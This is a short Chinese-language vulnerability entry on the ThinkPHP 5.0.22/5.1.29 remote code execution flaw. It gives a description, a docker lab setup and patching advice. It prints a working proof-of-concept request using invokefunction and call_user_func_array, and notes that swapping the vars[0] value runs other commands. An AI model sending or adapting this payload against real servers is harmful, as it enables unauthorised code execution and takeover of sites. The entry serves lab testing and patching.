5.24.3 RCE2
漏洞名称
ThinkPHP5 5.0.22/5.1.29 远程代码执行漏洞
漏洞描述
ThinkPHP是一款运用极广的PHP开发框架。其版本5中,由于没有正确处理控制器名,导致在网站没有开启强制路由的情况下(即默认情况下)可以执行任意方法,从而导致远程命令执行漏洞。
漏洞等级
高级
漏洞危害
远程代码执行
漏洞检测方法
利用POC去试验是否存在该漏洞
漏洞利用方法
启动docker环境:
docker-compose up -d

然后修改URL中的参数,构造POC,成功执行命令

发送的数据包为:
http://your-ip:8080/index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=-1`
也可以执行其他命令,只需替换vars[0]的值即可
漏洞修复方案:
1,及时去thinkphp官网修补漏洞
2,更新到最新版
Last updated
Was this helpful?